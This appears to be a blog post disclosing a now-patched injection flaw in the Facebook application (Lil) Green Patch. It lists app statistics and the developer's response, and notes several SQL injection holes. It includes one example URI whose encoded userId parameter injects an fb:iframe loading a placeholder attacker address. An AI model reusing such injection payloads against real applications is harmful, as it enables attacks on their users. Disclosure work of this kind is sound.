FAXX Hack: (Lil) Green Patch

Facebook Verified Application

Current Monthly Active Users: 2,400,608

Current Rank on Application Leaderboard: 64

Application Developer: Green Patch

Responsiveness: Green Patch did not send any messages, but did patch the hole.

Vulnerability Status: Patched

Capable of Clickjacking Install: Uncertain

Example URI: http://apps.facebook.com/greentrees/house.php?userId=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%2F%22%3E

Notes: This example URI once again does not include a standard double-injection trick. But I was unable to create such an exploit not because of a server whitelist or secure code. In fact, quite the opposite was true – nearly every time I tried to insert FBML or HTML into various pages, I ended up getting SQL errors. It quickly became clear that multiple SQL injection holes existed in this application. In this case, such problems weren’t entirely serious for users, as attacks would be accessing the application database, which does not store any sensitive information. Still, it’s disconcerting to find so many SQL injection holes in a Facebook Verified Application with over 2 million monthly active users.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark


Share with your friends!
  • Facebook
  • Twitter
  • Google Plus
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Comments are closed.

Email